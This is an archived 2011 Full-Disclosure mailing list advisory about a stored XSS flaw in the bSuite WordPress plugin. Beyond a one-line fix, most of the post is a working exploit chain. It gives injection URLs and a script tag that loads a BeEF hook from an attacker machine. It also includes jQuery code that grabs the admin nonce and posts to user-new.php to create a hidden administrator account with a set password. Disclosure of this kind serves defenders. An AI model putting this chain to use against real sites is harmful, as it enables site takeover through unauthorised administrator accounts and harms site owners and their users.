lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4E24A30F.2040708@ihteam.net>
Date: Mon, 18 Jul 2011 23:18:07 +0200
From: R00T_ATI <r00t_ati@...eam.net>
To: full-disclosure@...ts.grok.org.uk
Subject: bsuite <= 4.0.7 Permanent XSS (Remote add admin)
	- Wordpress plugin

Original advisory:
http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/

*WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin*
*Download link:* http://wordpress.org/extend/plugins/bsuite/
*Author contact:* 29/06/2011
*POC published:* 11/07/2011
Plugin is out-of-date, last update on 2009, so this is just a POC that
show how to made the XSS more useful ;)

*FIX:* Add htmlspecialchars to output

*Bug found by:* IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini

*Follow us on Twitter! @IHTeam <http://twitter.com/IHTeam>*

*CHECK BSUITE:*

http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js

*PERMANENT XSS POC:*
You can inject XSS in different way, for example:

http://192.168.1.100/wordpress/?s=<h2>XSSED</h2>

or directly in URL:

http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1>

Now, when admin enter in bSuite panel, will see the XSSED code

<http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg>

*XSS TO REMOTE ADMIN ADD:
*We will use beef <http://beefproject.com/>to do that part. So:

 1. Run beef on you local machine
 2. Enable auto-run that code:

    jQuery("<div>", {
    id: "testbeef"
    }).appendTo("#screen-meta-links");
    jQuery.get("user-new.php", function(data) {
    jQuery("#testbeef").html(data);
    var nonce=jQuery("#_wpnonce_create-user").val();
    jQuery("#testbeef").html("");

    jQuery.post("user-new.php", {
    "_wp_http_referer": "/wordpress/wp-admin/user-new.php",
    "_wpnonce_create-user": nonce,
    action: "createuser",
    createuser: "Add New User",
    email: "hax0rmail@...l.com",
    first_name: "",
    last_name: "",
    pass1: "123123hello",
    pass2: "123123hello",
    role: "administrator",
    url: "",
    user_login: "hax0r"
    });

    });

We make 2 request to //wordpress/wp-admin/user-new.php/ because we need
to grab /_wpnonce_create-user/ value.

 1. First create a new div with ID /testbeef/
 2. Request user-new.php and append content to the DIV
 3. Grab _wpnonce_create-user value to nonce variable
 4. Clean the DIV content;
 5. Make a POST request to user-new.php with the correct values

Review the code to change  _wp_http_referer, pass1, pass2 and user_login
of the POST request.
Now it's time to inject the beef control script in bSuite like this:

http://192.168.1.100/s=<script
src="http://192.168.1.102/beef/hook/beefmagic.js.php"></script>

You may wait 1h to 5h for bSuit refresh. It will result in new admin
with username: /haxor/ and password: /123123hello/

Content of type "text/html" skipped

Download attachment "icon_wink.gif" of type "image/gif" (170 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ